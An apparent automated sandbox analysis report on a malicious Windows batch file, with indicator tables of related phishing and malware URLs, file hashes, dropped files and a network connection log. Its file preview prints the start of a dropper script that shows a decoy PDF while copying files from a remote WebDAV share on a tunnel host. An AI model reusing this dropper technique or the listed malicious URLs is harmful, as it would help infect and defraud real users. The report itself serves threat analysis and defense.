                                                https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                WDzkAh06Pf.elfGet hashmaliciousMiraiBrowse
                                                • 70.38.94.230
                                                DHL-2854-56463.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 107.161.75.133
                                                Statement of account.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 174.142.95.75
                                                FEDEX DOCS ETD 08 MAY 2024. PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 174.142.95.75
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                1138de370e523e824bbca92d049a3777http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://all4promos.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://ahmetorak.com/neuromarketGet hashmaliciousHTMLPhisherBrowse
                                                • 23.206.229.209
                                                https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                • 23.206.229.209
                                                https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:90c503cb-cf61-4be1-b108-1df5bcac434aGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                https://lnk.sk/mzoyGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                https://miempresaessaludable.theobjective.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                28a2c9bd18a11de089ef85a160da29e4https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                http://all4promos.comGet hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                http://qcqsn.drivers-hp-dell-asus.ru/4Clxwy9769ZIGi545pwqtzclyna14499EAEPPODKZHNKREZ30JPNY13019f17Get hashmaliciousPhisherBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                http://ahmetorak.com/neuromarketGet hashmaliciousHTMLPhisherBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                https://steamcommunnittly.com/gift/activation/feor37565hFh6dseGet hashmaliciousUnknownBrowse
                                                • 2.18.97.153
                                                • 20.114.59.183
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:01:09 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2673
                                                Entropy (8bit):3.982030149215261
                                                Encrypted:false
                                                SSDEEP:48:8fi9duOT9ivKH2idAKZdA1P4ehwiZUklqehQy+3:8a+OxivrOvy
                                                MD5:7EA69F4E185FD65EA2EB0FC53660B1F9
                                                SHA1:874AB394F446CDC741D426B1EBDCDEC594D9B2A2
                                                SHA-256:519C7407E3EA37AD0E91106F98A59A319B8BBF0B7B1C61F407A117DDE5F207A8
                                                SHA-512:A6A958B5C777ADED900B24C305E056C4C4A4BE4DBAFF6CFA79B5E60905AE83636DBDEBEDBA37844D280DD882AA486113E56642B85BC1082C75520A3741257FF6
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.......C.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X%............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:01:09 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):3.997734187286364
                                                Encrypted:false
                                                SSDEEP:48:8y9duOT9ivKH2idAKZdA1+4eh/iZUkAQkqehfy+2:8y+OxivaF9QWy
                                                MD5:D04C309793D60906C0FBB5FA2B05AAC6
                                                SHA1:AB2C8C6F1F3E72752EA837889A590138AC8D072D
                                                SHA-256:0A1AE2491EF78D58098E0C60E09AC056DF14CA9ADD110D96A9E08D6A477512F9
                                                SHA-512:E76090F384132F3C0C75CFB77A2E87E355EA85F7E7591F4112CF8AB71E04A5AA52941C9666571EDA41D9B83E673A6D44F7BF057C218D27FB1ADD54DE11CE504F
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,........C.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X%............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.007835227669625
                                                Encrypted:false
                                                SSDEEP:48:8L9duOT9ivVH2idAKZdA1404eh7sFiZUkmgqeh7sVy+BX:8L+OxivuInjy
                                                MD5:65E1092D545A11EEF05EFE099074DDA7
                                                SHA1:6E4A372822A2F636463FE24FD1157A0240ED442D
                                                SHA-256:F9A2BDD324EF27AD69F646ED417A9DC437C8FAF30184E42945E2F0C10F00D89A
                                                SHA-512:417906D9AAD765A4A05ACB109E1FDC0A9083545EB9ECD3EF2B25D68A833F5756D9320F93C1F194E5000DA02F47B0016F02B9D73DD72E1E1597BC9E98DC91D083
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:01:09 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9971418065731688
                                                Encrypted:false
                                                SSDEEP:48:899duOT9ivKH2idAKZdA1p4ehDiZUkwqehLy+R:89+OxivN5dy
                                                MD5:90BCAFEA8CC71E439EFE952A0A8FEC14
                                                SHA1:47179D5346132F2C42CD842D2B9453315DD9FB48
                                                SHA-256:03EB6335589CB1116A4AD3473495AC484484BBA11DA1553D6BEE9512B26BF2C0
                                                SHA-512:CBD96BB7DD3C630ED12403E94E8745D186AD92CB2A2AA4CA15D4AD61B81F9269EC88BBBC22C02EFC5830F7737B7C5F81B9A30662C1518214AC68C2DFDD3AA9BB
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,........C.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X%............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:01:09 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9854937453191366
                                                Encrypted:false
                                                SSDEEP:48:8Q9duOT9ivKH2idAKZdA1X4ehBiZUk1W1qehJy+C:8Q+Oxivzb9py
                                                MD5:398B3EF0A075D13B0F98B8B0F1A9016D
                                                SHA1:E2ABD3E74AA1F53F4082A9FF65045C625F03056A
                                                SHA-256:305315667C1DA22AABD2B7B1FC787F9847F866EAF57FC208285333A52B52E955
                                                SHA-512:B339FA01EC4C67C116D49B8D7A1E164AFCD8189350C8E178CC7DE18395B7A5E1CABC281BB5EBD4765DEC24E588BA90C6E0366FEDEFEC3D33A16825C629192BC0
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....R..C.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X%............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:01:09 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.9948679823690223
                                                Encrypted:false
                                                SSDEEP:48:8q9duOT9ivKH2idAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbjy+yT+:8q+OxivcTcJTbxWOvTbjy7T
                                                MD5:EE584A288729133C469AA3CD058A69E5
                                                SHA1:02F0A54B88B6CDF43F5F04D7C154CFDE976F870A
                                                SHA-256:776E9BB2A2F25AAB6C07C18EAF7B9603AA243496D9A9D242194348C1C12669B0
                                                SHA-512:36100B29E868867B4F7096C959388F41DA81A6FAE00E8273FAC57049B40E40E25B06F318BE7970028E3F3911EE13D92AEC6213E08CB715455D8852D1E141B381
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....f..C.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X#.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X#.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X#.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X#..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X%............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........g.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                URL:https://s2r.tn/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                URL:https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                File type:DOS batch file, ASCII text, with CRLF line terminators
                                                Entropy (8bit):5.051702335746756
                                                TrID:
                                                  File name:file1.cmd
                                                  File size:3'097 bytes
                                                  MD5:79d0443c1e16cb595cbc94865d092fce
                                                  SHA1:87aea3eb544884d6763f6b8cda96869251f6d911
                                                  SHA256:27597b1219e3acecb7cb70f162f8cf2d28fba9238355f90f95e230365a8835d5
                                                  SHA512:5e1aabb2e6947af3a9ce68e699be38254c0474889790f02323d7a9c18cf81035d8527708f5547b27e1bf23f382c27acf18d1e139403c07a276e221a4087bf22c
                                                  SSDEEP:96:mLjZESFHE1e4ZEd9BZRe01EIIlX1EpXZi5l1E5Pgjh1EE4rNc:kFh9Ekbt10l1Uel1U41Qy
                                                  TLSH:4151BFC2394E403C5270AB72BA308597D466708E6340B915B4FAC4EE0F765D85EFA7F5
                                                  File Content Preview:@echo off..setlocal....set source=\\maintenance-princess-musical-vocational.trycloudflare.com@SSL\DavWWWRoot\google\Win..set desusertion=%USERPROFILE%\Downloads....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....copy /Y "%sourc
                                                  Icon Hash:9686878b929a9886
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:00:59.563927889 CEST49673443192.168.2.9204.79.197.203
                                                  May 23, 2024 21:01:03.313874006 CEST49675443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:03.329458952 CEST49676443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:03.439341068 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:03.579466105 CEST49674443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:03.751348972 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:04.360744953 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:04.376363993 CEST49673443192.168.2.9204.79.197.203
                                                  May 23, 2024 21:01:05.563843966 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:07.969419003 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:08.142554045 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.142600060 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.142654896 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.168689966 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.168716908 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.683423996 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.684195995 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.684207916 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.685256958 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.685343027 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.686669111 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.686749935 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.686920881 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.733521938 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.733541012 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.779541969 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.851512909 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.851715088 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.851861954 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.915458918 CEST49709443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.915476084 CEST4434970970.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.979445934 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.979486942 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:08.979718924 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.979835033 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:08.979851007 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.024890900 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.024930000 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.025007963 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.025465012 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.025480032 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.524862051 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.525244951 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.525262117 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.526385069 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.526912928 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.527091026 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.527172089 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.564569950 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.564981937 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.564991951 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.565391064 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.567222118 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.567312956 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.567446947 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.570538044 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.614517927 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.727545977 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.727632999 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.727662086 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.727683067 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.727854013 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.727902889 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.732707977 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.732722998 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:09.736861944 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:01:09.736866951 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:01:12.383097887 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:12.383131981 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:12.383219004 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:12.383460045 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:12.383471966 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:12.770598888 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:01:12.807903051 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:12.807945967 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:12.808109045 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:12.810184956 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:12.810203075 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:12.929451942 CEST49675443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:12.944498062 CEST49676443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:13.043510914 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:13.043963909 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:13.043987989 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:13.044991970 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:13.045185089 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:13.046120882 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:13.046190977 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:13.097420931 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:13.097441912 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:01:13.144282103 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:01:13.191286087 CEST49674443192.168.2.923.206.229.209
                                                  May 23, 2024 21:01:13.465884924 CEST443497172.18.97.153192.168.2.9
                                                  May 23, 2024 21:01:13.465955973 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.471046925 CEST49717443192.168.2.92.18.97.153
                                                  May 23, 2024 21:01:13.471056938 CEST443497172.18.97.153192.168.2.9
